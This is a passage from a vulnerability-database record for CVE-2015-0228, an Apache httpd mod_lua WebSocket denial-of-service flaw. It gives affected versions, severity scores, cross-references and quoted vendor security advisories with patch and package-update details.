trust: 0.3, vendor: "apple", version: "x10.10.5", }, { model: "mac os", scope: "eq", trust: 0.3, vendor: "apple", version: "x10.9.5", }, { model: "mac os", scope: "eq", trust: 0.3, vendor: "apple", version: "x10.10.4", }, { model: "mac os", scope: "eq", trust: 0.3, vendor: "apple", version: "x10.10.3", }, { model: "mac os", scope: "eq", trust: 0.3, vendor: "apple", version: "x10.10.2", }, { model: "mac os", scope: "eq", trust: 0.3, vendor: "apple", version: "x10.10.1", }, { model: "mac os", scope: "eq", trust: 0.3, vendor: "apple", version: "x10.10", }, { model: "apache", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4.12", }, { model: "apache", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4.11", }, { model: "apache", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4.10", }, { model: "apache", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4.4", }, { model: "apache", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4.9", }, { model: "apache", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4.8", }, { model: "apache", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4.7", }, { model: "apache", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4.6", }, { model: "apache", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4.3", }, { model: "apache", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4.2", }, { model: "apache", scope: "eq", trust: 0.3, vendor: "apache", version: "2.4.1", }, { model: "mac os server", scope: "ne", trust: 0.3, vendor: "apple", version: "x5.0.3", }, { model: "mac os", scope: "ne", trust: 0.3, vendor: "apple", version: "x10.10.5", }, { model: "apache", scope: "ne", trust: 0.3, vendor: "apache", version: "2.4.13", }, ], sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "73041", }, { db: "JVNDB", id: "JVNDB-2015-001673", }, { db: "CNNVD", id: "CNNVD-201503-136", }, { db: "NVD", id: "CVE-2015-0228", }, ], }, configurations: { "@context": { "@vocab": 
"https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/a:apache:http_server", vulnerable: true, }, { cpe22Uri: "cpe:/o:apple:mac_os_x", vulnerable: true, }, { cpe22Uri: "cpe:/o:apple:os_x_server", vulnerable: true, }, { cpe22Uri: "cpe:/a:oracle:enterprise_manager_ops_center", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2015-001673", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle", sources: [ { db: "BID", id: "91787", }, ], trust: 0.3, }, cve: "CVE-2015-0228", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 5, confidentialityImpact: "NONE", exploitabilityScore: 10, id: "CVE-2015-0228", impactScore: 2.9, integrityImpact: "NONE", severity: "MEDIUM", trust: 1.9, vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P", version: "2.0", }, { accessComplexity: "LOW", accessVector: "NETWORK", authentication: 
"NONE", author: "VULHUB", availabilityImpact: "PARTIAL", baseScore: 5, confidentialityImpact: "NONE", exploitabilityScore: 10, id: "VHN-78174", impactScore: 2.9, integrityImpact: "NONE", severity: "MEDIUM", trust: 0.1, vectorString: "AV:N/AC:L/AU:N/C:N/I:N/A:P", version: "2.0", }, ], cvssV3: [], severity: [ { author: "nvd@nist.gov", id: "CVE-2015-0228", trust: 1, value: "MEDIUM", }, { author: "NVD", id: "CVE-2015-0228", trust: 0.8, value: "Medium", }, { author: "CNNVD", id: "CNNVD-201503-136", trust: 0.6, value: "MEDIUM", }, { author: "VULHUB", id: "VHN-78174", trust: 0.1, value: "MEDIUM", }, { author: "VULMON", id: "CVE-2015-0228", trust: 0.1, value: "MEDIUM", }, ], }, ], sources: [ { db: "VULHUB", id: "VHN-78174", }, { db: "VULMON", id: "CVE-2015-0228", }, { db: "JVNDB", id: "JVNDB-2015-001673", }, { db: "CNNVD", id: "CNNVD-201503-136", }, { db: "NVD", id: "CVE-2015-0228", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "The lua_websocket_read function in lua_request.c in the mod_lua module in the Apache HTTP Server through 2.4.12 allows remote attackers to cause a denial of service (child-process crash) by sending a crafted WebSocket Ping frame after a Lua script has called the wsupgrade function. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. 
The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications Policy Management\nOracle Communications Session Border Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail 
Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Apache HTTP Server is prone to a remote denial-of-service vulnerability. \nA remote attacker may exploit this issue to trigger denial-of-service conditions. \nVersions prior to Apache HTTP Server 2.4.13 are vulnerable. The server is fast, reliable and extensible through a simple API. ============================================================================\nUbuntu Security Notice USN-2523-1\nMarch 10, 2015\n\napache2 vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.10\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Apache HTTP Server. This\nissue only affected Ubuntu 14.04 LTS and Ubuntu 14.10. (CVE-2014-3581)\n\nTeguh P. 
Alko discovered that the mod_proxy_fcgi module incorrectly\nhandled long response headers. This\nissue only affected Ubuntu 14.10. (CVE-2014-3583)\n\nIt was discovered that the mod_lua module incorrectly handled different\narguments within different contexts. This issue only affected\nUbuntu 14.10. (CVE-2014-8109)\n\nGuido Vranken discovered that the mod_lua module incorrectly handled a\nspecially crafted websocket PING in certain circumstances. This issue only affected\nUbuntu 14.10. (CVE-2015-0228)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.10:\n apache2.2-bin 2.4.10-1ubuntu1.1\n\nUbuntu 14.04 LTS:\n apache2.2-bin 2.4.7-1ubuntu4.4\n\nUbuntu 12.04 LTS:\n apache2.2-bin 2.2.22-1ubuntu1.8\n\nUbuntu 10.04 LTS:\n apache2.2-bin 2.2.14-5ubuntu8.15\n\nIn general, a standard system update will make all the necessary changes. \n \n A race condition flaw, leading to heap-based buffer overflows,\n was found in the mod_status httpd module. \n \n mod_lua.c in the mod_lua module in the Apache HTTP Server through\n 2.4.10 does not support an httpd configuration in which the same\n Lua authorization provider is used with different arguments within\n different contexts, which allows remote attackers to bypass intended\n access restrictions in opportunistic circumstances by leveraging\n multiple Require directives, as demonstrated by a configuration that\n specifies authorization for one group to access a certain directory,\n and authorization for a second group to access a second directory\n (CVE-2014-8109). A malicious client could\n use Trailer headers to set additional HTTP headers after header\n processing was performed by other modules. This could, for example,\n lead to a bypass of header restrictions defined with mod_headers\n (CVE-2013-5704). \n \n Note: With this update, httpd has been modified to not merge HTTP\n Trailer headers with other HTTP request headers. 
A newly introduced\n configuration directive MergeTrailers can be used to re-enable the\n old method of processing Trailer headers, which also re-introduces\n the aforementioned flaw. \n \n This update also fixes the following bug:\n \n Prior to this update, the mod_proxy_wstunnel module failed to set\n up an SSL connection when configured to use a back end server using\n the wss: URL scheme, causing proxied connections to fail. In these\n updated packages, SSL is used when proxying to wss: back end servers\n (rhbz#1141950). The verification\n of md5 checksums and GPG signatures is performed automatically for you. You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n http://www.mandriva.com/en/support/security/advisories/\n\n If you want to report vulnerabilities, please contact\n\n security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID Date User ID\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\n <security*mandriva.com>\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.12 (GNU/Linux)\n\niD8DBQFVFnRImqjQ0CJFipgRAhbAAKDF22tbaWSxzaiqvhq0t6uM1bwWvgCfVNIJ\n7XU6s8wMPlxQucpKSIVIKYI=\n=4uS5\n-----END PGP SIGNATURE-----\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: httpd24-httpd security update\nAdvisory ID: RHSA-2015:1666-01\nProduct: Red Hat Software Collections\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-1666.html\nIssue date: 2015-08-24\nCVE Names: CVE-2015-0228 CVE-2015-0253 CVE-2015-3183 \n CVE-2015-3185 \n=====================================================================\n\n1. Summary:\n\nUpdated httpd24-httpd packages that fix multiple security issues are now\navailable for Red Hat Software Collections 2. 
\n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - noarch, x86_64\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch, x86_64\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.5) - noarch, x86_64\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6) - noarch, x86_64\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.1) - noarch, x86_64\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - noarch, x86_64\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64\n\n3. \n\nMultiple flaws were found in the way httpd parsed HTTP requests and\nresponses using chunked transfer encoding. A remote attacker could use\nthese flaws to create a specially crafted request, which httpd would decode\ndifferently from an HTTP proxy software in front of it, possibly leading to\nHTTP request smuggling attacks. (CVE-2015-3183)\n\nIt was discovered that in httpd 2.4, the internal API function\nap_some_auth_required() could incorrectly indicate that a request was\nauthenticated even when no authentication was used. An httpd module using\nthis API function could consequently allow access that should have been\ndenied. (CVE-2015-3185)\n\nNote: This update introduces a new API function,\nap_some_authn_required(), which correctly indicates if a request is\nauthenticated. External httpd modules using the old API function should be\nmodified to use the new one to completely resolve this issue. 
\n\nA denial of service flaw was found in the way the mod_lua httpd module\nprocessed certain WebSocket Ping requests. (CVE-2015-0228)\n\nA NULL pointer dereference flaw was found in the way httpd generated\ncertain error responses. A remote attacker could possibly use this flaw to\ncrash the httpd child process using a request that triggers a certain HTTP\nerror. (CVE-2015-0253)\n\nAll httpd24-httpd users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After installing\nthe updated packages, the httpd24-httpd service will be restarted\nautomatically. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1202988 - CVE-2015-0228 httpd: Possible mod_lua crash due to websocket bug\n1243887 - CVE-2015-3183 httpd: HTTP request smuggling attack against chunked request parser\n1243888 - CVE-2015-3185 httpd: ap_some_auth_required() does not properly indicate authenticated request in 2.4\n1243891 - CVE-2015-0253 httpd: NULL pointer dereference crash with ErrorDocument 400 pointing to a local URL-path\n\n6. Package List:\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 6):\n\nSource:\nhttpd24-httpd-2.4.12-4.el6.2.src.rpm\n\nnoarch:\nhttpd24-httpd-manual-2.4.12-4.el6.2.noarch.rpm\n\nx86_64:\nhttpd24-httpd-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-httpd-debuginfo-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-httpd-devel-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-httpd-tools-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_ldap-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_proxy_html-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_session-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_ssl-2.4.12-4.el6.2.x86_64.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 
6.5):\n\nSource:\nhttpd24-httpd-2.4.12-4.el6.2.src.rpm\n\nnoarch:\nhttpd24-httpd-manual-2.4.12-4.el6.2.noarch.rpm\n\nx86_64:\nhttpd24-httpd-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-httpd-debuginfo-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-httpd-devel-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-httpd-tools-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_ldap-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_proxy_html-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_session-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_ssl-2.4.12-4.el6.2.x86_64.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.6):\n\nSource:\nhttpd24-httpd-2.4.12-4.el6.2.src.rpm\n\nnoarch:\nhttpd24-httpd-manual-2.4.12-4.el6.2.noarch.rpm\n\nx86_64:\nhttpd24-httpd-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-httpd-debuginfo-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-httpd-devel-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-httpd-tools-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_ldap-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_proxy_html-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_session-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_ssl-2.4.12-4.el6.2.x86_64.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nhttpd24-httpd-2.4.12-4.el6.2.src.rpm\n\nnoarch:\nhttpd24-httpd-manual-2.4.12-4.el6.2.noarch.rpm\n\nx86_64:\nhttpd24-httpd-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-httpd-debuginfo-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-httpd-devel-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-httpd-tools-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_ldap-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_proxy_html-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_session-2.4.12-4.el6.2.x86_64.rpm\nhttpd24-mod_ssl-2.4.12-4.el6.2.x86_64.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 
7):\n\nSource:\nhttpd24-httpd-2.4.12-6.el7.1.src.rpm\n\nnoarch:\nhttpd24-httpd-manual-2.4.12-6.el7.1.noarch.rpm\n\nx86_64:\nhttpd24-httpd-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-httpd-debuginfo-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-httpd-devel-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-httpd-tools-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-mod_ldap-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-mod_proxy_html-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-mod_session-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-mod_ssl-2.4.12-6.el7.1.x86_64.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.1):\n\nSource:\nhttpd24-httpd-2.4.12-6.el7.1.src.rpm\n\nnoarch:\nhttpd24-httpd-manual-2.4.12-6.el7.1.noarch.rpm\n\nx86_64:\nhttpd24-httpd-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-httpd-debuginfo-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-httpd-devel-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-httpd-tools-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-mod_ldap-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-mod_proxy_html-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-mod_session-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-mod_ssl-2.4.12-6.el7.1.x86_64.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nhttpd24-httpd-2.4.12-6.el7.1.src.rpm\n\nnoarch:\nhttpd24-httpd-manual-2.4.12-6.el7.1.noarch.rpm\n\nx86_64:\nhttpd24-httpd-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-httpd-debuginfo-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-httpd-devel-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-httpd-tools-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-mod_ldap-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-mod_proxy_html-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-mod_session-2.4.12-6.el7.1.x86_64.rpm\nhttpd24-mod_ssl-2.4.12-6.el7.1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. 
References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-0228\nhttps://access.redhat.com/security/cve/CVE-2015-0253\nhttps://access.redhat.com/security/cve/CVE-2015-3183\nhttps://access.redhat.com/security/cve/CVE-2015-3185\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is <secalert@redhat.com>. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFV22bPXlSAg2UNWIIRAmm2AKCI6AByn1Zlj/2R8aLKFD4hZno5VgCfcx8H\ny5DWl0MjeqKeAOHiddwyDdU=\n=yzQP\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. These issues were addressed by updating Apache to\nversion 2.4.16. \nCVE-ID\nCVE-2013-5704\nCVE-2014-3581\nCVE-2014-3583\nCVE-2014-8109\nCVE-2015-0228\nCVE-2015-0253\nCVE-2015-3183\nCVE-2015-3185\n\nBIND\nAvailable for: OS X Yosemite v10.10.4 or later\nImpact: Multiple vulnerabilities in BIND, the most severe of which\nmay allow a remote attacker to cause a denial of service\nDescription: Multiple vulnerabilities existed in BIND versions prior\nto 9.9.7. These issues were addressed by updating BIND to version\n9.9.7. \nCVE-ID\nCVE-2014-8500\nCVE-2015-1349\n\nPostgreSQL\nAvailable for: OS X Yosemite v10.10.4 or later\nImpact: Multiple vulnerabilities in PostgreSQL, the most serious of\nwhich may lead to arbitrary code execution\nDescription: Multiple vulnerabilities existed in PostgreSQL versions\nprior to 9.3.9. These issues were addressed by updating PostgreSQL to\nversion 9.3.9. 
\nCVE-ID\nCVE-2014-0067\nCVE-2014-8161\nCVE-2015-0241\nCVE-2015-0242\nCVE-2015-0243\nCVE-2015-0244\nCVE-2015-3165\nCVE-2015-3166\nCVE-2015-3167\n\nWiki Server\nAvailable for: OS X Yosemite v10.10.4 or later\nImpact: Multiple XML security issues in Wiki Server\nDescription: Multiple XML vulnerabilities existed in Wiki Server\nbased on Twisted. This issue was addressed by removing Twisted. \nCVE-ID\nCVE-2015-5911 : Zachary Jones of WhiteHat Security Threat Research\nCenter\n\n\nOS X Server 5.0.3 may be obtained from the Mac App Store. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/httpd-2.4.16-i486-1_slack14.1.txz: Upgraded. \n This update fixes the following security issues:\n * CVE-2015-0253: Fix a crash with ErrorDocument 400 pointing to a local\n URL-path with the INCLUDES filter active, introduced in 2.4.11. \n * CVE-2015-3183: core: Fix chunk header parsing defect. Remove\n apr_brigade_flatten(), buffering and duplicated code from the HTTP_IN\n filter, parse chunks in a single pass with zero copy. Limit accepted\n chunk-size to 2^63-1 and be strict about chunk-ext authorized characters. \n * CVE-2015-3185: Replacement of ap_some_auth_required (unusable in Apache\n httpd 2.4) with new ap_some_authn_required and ap_force_authn hook. \n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0228\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0253\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3183\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3185\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. 
\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/httpd-2.4.16-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/httpd-2.4.16-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/httpd-2.4.16-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/httpd-2.4.16-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.16-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.16-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.0 package:\nd78c9925e69ba6ce14d67fb67245981b httpd-2.4.16-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n1370e3c7e135bf07b65e73049099a942 httpd-2.4.16-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nea116c45bba8c80f59cfe0394a8f87fa httpd-2.4.16-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n8b5b1caa1fa203b07b529f77834fac16 httpd-2.4.16-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n01ccb961f17bd14c1d157892af4c9f1d n/httpd-2.4.16-i586-1.txz\n\nSlackware x86_64 -current package:\n70a6644de3585007861e57cf08608843 n/httpd-2.4.16-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg httpd-2.4.16-i486-1_slack14.1.txz\n\nThen, restart Apache httpd:\n\n# /etc/rc.d/rc.httpd stop\n# /etc/rc.d/rc.httpd start\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: 
|\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address", sources: [ { db: "NVD", id: "CVE-2015-0228", }, { db: "JVNDB", id: "JVNDB-2015-001673", }, { db: "BID", id: "91787", }, { db: "BID", id: "73041", }, { db: "VULHUB", id: "VHN-78174", }, { db: "VULMON", id: "CVE-2015-0228", }, { db: "PACKETSTORM", id: "130735", }, { db: "PACKETSTORM", id: "131098", }, { db: "PACKETSTORM", id: "133281", }, { db: "PACKETSTORM", id: "133619", }, { db: "PACKETSTORM", id: "132743", }, ], trust: 2.79, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2015-0228", trust: 3.4, }, { db: "BID", id: "91787", trust: 2.1, }, { db: "BID", id: "73041", trust: 2.1, }, { db: "SECTRACK", id: "1032967", trust: 1.8, }, { db: "JVN", id: "JVNVU99970459", trust: 0.8, }, { db: "JVNDB", id: "JVNDB-2015-001673", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201503-136", trust: 0.7, }, { db: "PACKETSTORM", id: "133281", trust: 0.2, }, { db: "PACKETSTORM", id: "132743", trust: 0.2, }, { db: "VULHUB", id: "VHN-78174", trust: 0.1, }, { db: "VULMON", id: "CVE-2015-0228", trust: 0.1, }, { db: "PACKETSTORM", id: "130735", trust: 0.1, }, { db: "PACKETSTORM", id: "131098", trust: 0.1, }, { db: "PACKETSTORM", id: "133619", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-78174", }, { db: "VULMON", id: "CVE-2015-0228", }, { db: "BID", id: "91787", }, { db: "BID", id: "73041", }, { db: "JVNDB", id: "JVNDB-2015-001673", }, { db: "PACKETSTORM", id: "130735", }, { db: "PACKETSTORM", id: "131098", }, { db: 
"PACKETSTORM", id: "133281", }, { db: "PACKETSTORM", id: "133619", }, { db: "PACKETSTORM", id: "132743", }, { db: "CNNVD", id: "CNNVD-201503-136", }, { db: "NVD", id: "CVE-2015-0228", }, ], }, id: "VAR-201503-0050", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-78174", }, ], trust: 0.01, }, last_update_date: "2024-11-23T19:29:26.462000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "APPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update 2015-006", trust: 0.8, url: "http://lists.apple.com/archives/security-announce/2015/Aug/msg00001.html", }, { title: "APPLE-SA-2015-09-16-4 OS X Server 5.0.3", trust: 0.8, url: "http://lists.apple.com/archives/security-announce/2015/Sep/msg00004.html", }, { title: "HT205219", trust: 0.8, url: 